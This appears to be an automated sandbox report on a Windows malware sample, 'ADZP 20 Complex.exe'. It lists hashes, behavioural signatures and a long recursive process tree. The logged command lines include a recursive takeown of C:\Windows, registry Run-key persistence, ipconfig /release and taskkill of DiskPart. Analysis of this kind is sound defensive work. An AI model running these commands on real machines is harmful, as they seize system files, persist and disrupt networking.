Analysis
- max time kernel: 121s
- max time network: 497s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64 arch:x86 image:win10v2004-20230220-en locale:en-us os:windows10-2004-x64 system
- submitted: 06-04-2023 22:47
Static task: static1
Behavioral task: behavioral1
Sample: ADZP 20 Complex.exe
Resource: win7-20230220-en
General
- Target: ADZP 20 Complex.exe
- Size: 102KB
- MD5: b64873bc80527aa8e18c0a3b95244f19
- SHA1: af6c574a2b8fac6a565c551a196ce07e92fd05cc
- SHA256: 30a220aed9f5c0c92a4737a4f32b2ce66eb3d1e8525d0b6879321592b79096ca
- SHA512: b78165b6edec3abd32ee2bd0465cbc7e30fc14c32db66b65bebb0c1d5a7061cec85172f26a57b97630baa47ee17405560f17da5f37d9f80d141dba5198158f7c
- SSDEEP: 1536:j7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIf9w2PwpLpNuOh:/7DhdC6kzWypvaQ0FxyNTBf9T8Dv
Malware Config
Signatures
-
Possible privilege escalation attempt 64 IoCs
Processes: takeown.exe, icacls.exe
-
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: cmd.exe
description: Key value queried
ioc: \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation
process: cmd.exe
-
Modifies file permissions 1 TTPs 64 IoCs
Processes: takeown.exe, icacls.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops autorun.inf file 1 TTPs 9 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes: cmd.exe
description: File opened for modification
ioc: C:\Users\Admin\AppData\Local\Temp\Autorun.inf
process: cmd.exe
-
Drops file in Windows directory 10 IoCs
Processes: mspaint.exe
description: File opened for modification
ioc: C:\Windows\Debug\WIA\wiatrace.log
process: mspaint.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes: WerFault.exe
pid: 6960
pid_target: 4204
process: WerFault.exe
target process: dwm.exe
-
Gathers network information 2 TTPs 23 IoCs
Uses commandline utility to view network configuration.
Processes: ipconfig.exe
-
Kills process with taskkill 21 IoCs
Processes: taskkill.exe
-
Modifies registry class 29 IoCs
Processes: cmd.exe, calc.exe, WScript.exe, explorer.exe, taskkill.exe, takeown.exe, Conhost.exe
description: Key created
ioc: \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings
process: cmd.exe, calc.exe, WScript.exe, explorer.exe, taskkill.exe, takeown.exe, Conhost.exe
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes: mspaint.exe
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes: takeown.exe, taskkill.exe, Conhost.exe, WScript.exe
description, pid, process:
Token: SeTakeOwnershipPrivilege, 224, takeown.exe
Token: SeDebugPrivilege, 3904, taskkill.exe
Token: SeTakeOwnershipPrivilege, 4200, takeown.exe
Token: SeDebugPrivilege, 4756, taskkill.exe
Token: SeTakeOwnershipPrivilege, 3396, takeown.exe
Token: SeDebugPrivilege, 2476, taskkill.exe
Token: SeTakeOwnershipPrivilege, 6932, takeown.exe
Token: SeDebugPrivilege, 6044, taskkill.exe
Token: SeTakeOwnershipPrivilege, 6852, takeown.exe
Token: SeTakeOwnershipPrivilege, 5764, takeown.exe
Token: SeDebugPrivilege, 6132, Conhost.exe
Token: SeTakeOwnershipPrivilege, 4584, takeown.exe
Token: SeDebugPrivilege, 5920, taskkill.exe
Token: SeDebugPrivilege, 4512, WScript.exe
Token: SeTakeOwnershipPrivilege, 7436, takeown.exe
-
Suspicious use of SetWindowsHookEx 49 IoCs
Processes: mspaint.exe, OpenWith.exe, takeown.exe, cmd.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: ADZP 20 Complex.exe, cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AC33.tmp\AC34.tmp\AC35.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""2⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r4⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!3⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BB27.tmp\BB28.tmp\BB29.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""4⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat5⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f5⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!5⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2ED0.tmp\2ED1.tmp\2ED2.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\81DD.tmp\81DE.tmp\81DF.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\926E.tmp\926F.tmp\927F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f11⤵
- Kills process with taskkill
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C219.tmp\C21A.tmp\C21B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f11⤵
- Kills process with taskkill
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
-
C:\Windows\explorer.exeexplorer.exe7⤵
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B1A7.tmp\B1A8.tmp\B1A9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Modifies registry class
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\12AE.tmp\12AF.tmp\12B0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3922.tmp\3923.tmp\3924.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"11⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
-
C:\Windows\explorer.exeexplorer.exe7⤵
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\notepad.exenotepad5⤵
-
C:\Windows\system32\calc.execalc5⤵
- Modifies registry class
-
C:\Windows\system32\notepad.exenotepad5⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3B44.tmp\3B45.tmp\3B46.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r8⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
